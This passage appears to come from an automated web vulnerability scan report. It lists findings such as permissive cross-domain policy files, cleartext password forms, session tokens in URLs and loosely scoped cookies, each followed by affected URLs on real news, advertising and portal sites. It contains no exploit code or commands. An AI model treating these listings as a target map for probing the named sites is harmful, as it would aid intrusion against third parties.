5.96. http://rt1702.infolinks.com/crossdomain.xml
5.97. http://rt1803.infolinks.com/crossdomain.xml
5.98. http://rt1804.infolinks.com/crossdomain.xml
5.99. http://rt1901.infolinks.com/crossdomain.xml
5.100. http://rt1903.infolinks.com/crossdomain.xml
5.101. http://s0.2mdn.net/crossdomain.xml
5.102. http://sana.newsinc.com/crossdomain.xml
5.103. http://segment-pixel.invitemedia.com/crossdomain.xml
5.104. http://sensor2.suitesmart.com/crossdomain.xml
5.105. http://servedby.flashtalking.com/crossdomain.xml
5.106. http://spe.atdmt.com/crossdomain.xml
5.107. http://static.scanscout.com/crossdomain.xml
5.108. http://stats.kaltura.com/crossdomain.xml
5.109. http://t.mookie1.com/crossdomain.xml
5.110. http://tags.bluekai.com/crossdomain.xml
5.111. http://thumbnails.infolinks.com/crossdomain.xml
5.112. http://traffic.outbrain.com/crossdomain.xml
5.113. http://trk.vindicosuite.com/crossdomain.xml
5.114. http://u-ads.adap.tv/crossdomain.xml
5.115. http://vads.adbrite.com/crossdomain.xml
5.116. http://vast.bp3845889.btrll.com/crossdomain.xml
5.117. http://w88.go.com/crossdomain.xml
5.118. http://wls.wireless.att.com/crossdomain.xml
5.119. http://www.kaltura.com/crossdomain.xml
5.120. http://a.abc.com/crossdomain.xml
5.121. http://abc.go.com/crossdomain.xml
5.122. http://adimages.go.com/crossdomain.xml
5.123. http://ads.adsonar.com/crossdomain.xml
5.124. http://ads.dotomi.com/crossdomain.xml
5.125. http://ads.tw.adsonar.com/crossdomain.xml
5.126. http://adsatt.abc.starwave.com/crossdomain.xml
5.127. http://bh.heraldinteractive.com/crossdomain.xml
5.128. http://bostonherald.com/crossdomain.xml
5.129. http://bostonheraldnie.newspaperdirect.com/crossdomain.xml
5.130. http://cache.heraldinteractive.com/crossdomain.xml
5.131. http://cdn.abc.go.com/crossdomain.xml
5.132. http://cdn.media.abc.com/crossdomain.xml
5.133. http://cdn.media.abc.go.com/crossdomain.xml
5.134. http://cdn.video.abc.com/crossdomain.xml
5.135. http://cim.meebo.com/crossdomain.xml
5.136. http://cookex.amp.yahoo.com/crossdomain.xml
5.137. http://images.search.yahoo.com/crossdomain.xml
5.138. http://mi.adinterax.com/crossdomain.xml
5.139. http://omg.yahoo.com/crossdomain.xml
5.140. http://qa.n7.vp2.abc.go.com/crossdomain.xml
5.141. http://rd.meebo.com/crossdomain.xml
5.142. http://search.yahoo.com/crossdomain.xml
5.143. http://site.abc.go.com/crossdomain.xml
5.144. http://syndication.mmismm.com/crossdomain.xml
5.145. http://us.adserver.yahoo.com/crossdomain.xml
5.146. http://vid.catalog.newsinc.com/crossdomain.xml
5.147. http://www.att.com/crossdomain.xml
5.148. http://www.bostonherald.com/crossdomain.xml
5.149. http://www.meebo.com/crossdomain.xml
5.150. http://www.tmz.com/crossdomain.xml
5.151. http://bigapple.contextuads.com/crossdomain.xml
5.152. http://bit.ly/crossdomain.xml
6. Silverlight cross-domain policy
6.1. http://2912a.v.fwmrm.net/clientaccesspolicy.xml
6.2. http://adm.fwmrm.net/clientaccesspolicy.xml
6.3. http://adunit.cdn.auditude.com/clientaccesspolicy.xml
6.4. http://b.voicefive.com/clientaccesspolicy.xml
6.5. http://cdn.kaltura.com/clientaccesspolicy.xml
6.6. http://cdnbakmi.kaltura.com/clientaccesspolicy.xml
6.7. http://clk.atdmt.com/clientaccesspolicy.xml
6.8. http://dp.33across.com/clientaccesspolicy.xml
6.9. http://metrics.tmz.com/clientaccesspolicy.xml
6.10. http://pixel.33across.com/clientaccesspolicy.xml
6.11. http://s0.2mdn.net/clientaccesspolicy.xml
6.12. http://spe.atdmt.com/clientaccesspolicy.xml
6.13. http://stats.kaltura.com/clientaccesspolicy.xml
6.14. http://trk.vindicosuite.com/clientaccesspolicy.xml
6.15. http://w88.go.com/clientaccesspolicy.xml
6.16. http://www.kaltura.com/clientaccesspolicy.xml
6.17. http://ts1.mm.bing.net/clientaccesspolicy.xml
6.18. http://ts2.mm.bing.net/clientaccesspolicy.xml
6.19. http://ts3.mm.bing.net/clientaccesspolicy.xml
6.20. http://ts4.mm.bing.net/clientaccesspolicy.xml
7. Cleartext submission of password
7.1. http://dw1.s81c.com/common/js/dynamicnav.js
7.2. http://forums.cpanel.net/calendar.php
7.3. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
7.4. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
7.5. http://www.actvalue.com/
7.6. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
7.7. http://www.ibm.com/common/js/dynamicnav.js
7.8. http://www.ibm.com/developerworks/java/
7.9. http://www.ibm.com/developerworks/java/find/standards/
7.10. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
7.11. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
7.12. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
7.13. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
7.14. http://www.ibm.com/search/csass/search/
7.15. http://www.ted.com/js/library.min.js
7.16. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
7.17. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
7.18. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
7.19. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
7.20. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
7.21. http://www.tmz.com/signin/
7.22. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
7.23. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
7.24. http://www.usenetbinaries.com/l/newsgroups.html
8. SQL statement in request parameter
9. SSL cookie without secure flag set
10. Session token in URL
10.1. http://arc.help.yahoo.com/error.gif
10.2. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard
10.3. http://omg.yahoo.com/
10.4. http://omg.yahoo.com/hot-topics
10.5. http://omg.yahoo.com/news/january-jones-welcomes-baby-boy-xander/72215
10.6. http://omg.yahoo.com/photos/what-were-they-thinking/5203
10.7. http://omg.yahoo.com/search
10.8. http://omg.yahoo.com/xhr/ad/LREC/2115806991
10.9. http://omg.yahoo.com/xhr/ad/LREC/2115823648
10.10. http://omg.yahoo.com/xhr/ad/LREC/2115823648
10.11. http://omg.yahoo.com/xhr/ad/MREC/2115823648
10.12. http://omg.yahoo.com/xhr/ad/MREC/2115823648
10.13. http://omg.yahoo.com/xhr/relatedsearch/
10.14. http://stats.kaltura.com//api_v3/index.php
10.15. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif
10.16. http://www.facebook.com/extern/login_status.php
10.17. http://www.itoncommand.com/GetAQuote.aspx
10.18. http://www.matrix42.com/new-to-matrix42/
10.19. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp
11. Cookie scoped to parent domain
11.1. http://www.mailjet.com/
11.2. http://www.mailjet.com/pricing
11.3. https://www.mailjet.com/signup
11.4. http://27.xg4ken.com/media/redir.php
11.5. http://2912a.v.fwmrm.net/ad/l/1
11.6. http://2912a.v.fwmrm.net/ad/l/1
11.7. http://2912a.v.fwmrm.net/ad/l/1
11.8. http://2912a.v.fwmrm.net/ad/p/1
11.9. http://a.collective-media.net/adj/cm.rev_bostonherald/
11.10. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience
11.11. http://a.collective-media.net/adj/q1.bosherald/be_news
11.12. http://a.collective-media.net/adj/q1.bosherald/ent_fr
11.13. http://a.collective-media.net/adj/q1.bosherald/news
11.14. http://a.collective-media.net/cmadj/cm.rev_bostonherald/
11.15. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience
11.16. http://a.collective-media.net/cmadj/q1.bosherald/be_news
11.17. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr
11.18. http://a.collective-media.net/cmadj/q1.bosherald/news
11.19. http://a.tribalfusion.com/i.cid
11.20. http://a.tribalfusion.com/j.ad
11.21. http://a.tribalfusion.com/z/i.cid
11.22. http://ad.auditude.com/adserver
11.23. http://ad.auditude.com/adserver
11.24. http://ad.auditude.com/adserver
11.25. http://ad.auditude.com/adserver
11.26. http://ad.auditude.com/adserver
11.27. http://ad.auditude.com/adserver
11.28. http://ad.auditude.com/adserver
11.29. http://ad.auditude.com/adserver
11.30. http://ad.auditude.com/adserver
11.31. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2
11.32. http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3
11.33. http://ad.doubleclick.net/adj/q1.bosherald/be_news
11.34. http://ad.doubleclick.net/adj/q1.bosherald/news
11.35. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups
11.36. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice
11.37. http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B245892120%3B0-0%3B0%3B69485624%3B4986-300/600%3B43918246/43936033/1%3B%3B~okv%3D%3Bpc%3DDFP245079213%3B%3B~fdr%3D245079213%3B0-0%3B0%3B61866028%3B4986-300/600%3B44072410/44090197/1%3B%3B~sscs%3D%3fhttp://t.mookie1.com/t/v1/clk
11.38. http://ads.lucidmedia.com/clicksense/pixel
11.39. http://adserver.teracent.net/tase/ad
11.40. http://adserver.teracent.net/tase/redir/1316221519820_135153353_as3104_imp/vew
11.41. http://adserver.teracent.net/tase/redir/1316221548433_135109402_as3106_imp/vew
11.42. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php
11.43. http://apis.google.com/js/plusone.js
11.44. http://ar.voicefive.com/b/recruitBeacon.pli
11.45. http://ar.voicefive.com/b/wc_beacon.pli
11.46. http://ar.voicefive.com/bmx3/broker.pli
11.47. http://b.scorecardresearch.com/b
11.48. http://b.scorecardresearch.com/p
11.49. http://b.scorecardresearch.com/r
11.50. http://b.voicefive.com/b
11.51. http://b.voicefive.com/p
11.52. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2
11.53. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0
11.54. http://c.statcounter.com/t.php
11.55. http://cdnt.meteorsolutions.com/api/setid
11.56. http://cdnt.meteorsolutions.com/api/track
11.57. http://cdnt.meteorsolutions.com/api/track
11.58. http://clk.atdmt.com/go/335787632/direct
11.59. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js
11.60. http://d7.zedo.com/img/bh.gif
11.61. http://d7.zedo.com/utils/ecSet.js
11.62. http://g2.gumgum.com/services/get
11.63. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/
11.64. http://i.w55c.net/a.gif
11.65. http://ib.adnxs.com/ptj
11.66. http://id.google.com/verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif
11.67. http://id.google.com/verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif
11.68. http://image2.pubmatic.com/AdServer/Pug
11.69. http://imp.fetchback.com/serve/fb/adtag.js
11.70. http://imp.fetchback.com/serve/fb/imp
11.71. http://leadback.advertising.com/adcedge/lb
11.72. http://leadback.advertising.com/adcedge/lb
11.73. http://loadm.exelator.com/load/
11.74. http://log.go.com/log
11.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Bottom
11.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle
11.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1
11.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top
11.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom
11.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
11.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
11.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
11.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@x01!x01
11.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Bottom
11.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle
11.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top
11.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@x01!x01
11.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
11.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
11.90. http://odb.outbrain.com/utils/get
11.91. http://omg.yahoo.com/photos/what-were-they-thinking/5203
11.92. http://ping.crowdscience.com/ping.js
11.93. http://r.turn.com/r/beacon
11.94. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/
11.95. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
11.96. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13141172/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
11.97. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13161297/hr=1/hl=11/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CBottom%2526page%253Dbh.heraldinteractive.com%25252F%252Fyour_tax_dollars_at_work
11.98. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=13485129/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
11.99. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=14907432/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
11.100. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=39615410/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
11.101. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=4347768/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
11.102. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=71688841/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.103. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=73068085/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.104. http://r1-ads.ace.advertising.com/site=753542/size=728090/u=2/bnum=87670031/hr=1/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DTop%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
11.105. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=15131969/hr=1/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fregional%25252Farticle
11.106. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=36701179/hr=1/hl=13/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.107. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=3823857/hr=1/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fcolumnists%25252Farticle
11.108. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=4214348/hr=1/hl=6/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fstar_tracks%25252Farticle
11.109. http://r1-ads.ace.advertising.com/site=753543/size=160600/u=2/bnum=94471246/hr=1/hl=15/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DRight%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle
11.110. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=1532848/hr=1/hl=9/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fnational%25252Fremembering_911%25252Fhome
11.111. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=19365718/hr=1/hl=10/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fentertainment%25252Fhome
11.112. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=2205187/hr=1/hl=7/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Fhome
11.113. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome
11.114. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1
11.115. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
11.116. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D
11.117. http://receive.inplay.tubemogul.com/StreamReceiver/services
11.118. http://rs.gwallet.com/r1/pixel/x420r2425801
11.119. http://rt.legolas-media.com/lgrt
11.120. http://rt1302.infolinks.com/action/doq.htm
11.121. http://rt1701.infolinks.com/action/doq.htm
11.122. http://rt1702.infolinks.com/action/doq.htm
11.123. http://rt1803.infolinks.com/action/doq.htm
11.124. http://rt1804.infolinks.com/action/doq.htm
11.125. http://rt1901.infolinks.com/action/doq.htm
11.126. http://rt1903.infolinks.com/action/doq.htm
11.127. http://sensor2.suitesmart.com/sensor4.js
11.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.132. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.133. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.134. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.135. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.136. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.137. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.138. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.139. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.140. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.141. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.142. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.143. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.144. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.145. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.146. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.147. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.148. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.149. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.150. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.151. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.152. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.153. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.154. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.155. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.156. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.157. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.158. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.159. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.160. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.161. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.163. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.165. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.166. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.167. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.168. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.169. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.170. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.171. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.172. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.173. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.174. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.175. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.176. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.177. http://showadsak.pubmatic.com/AdServer/AdServerServlet
11.178. http://tag.contextweb.com/TagPublish/GetAd.aspx
11.179. http://tag.contextweb.com/TagPublish/GetAd.aspx
11.180. http://tenzing.fmpub.net/
11.181. http://testdm.travelers.com/trvwics.gif
11.182. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif
11.183. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif
11.184. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif
11.185. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif
11.186. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif
11.187. http://traffic.outbrain.com/network/redir
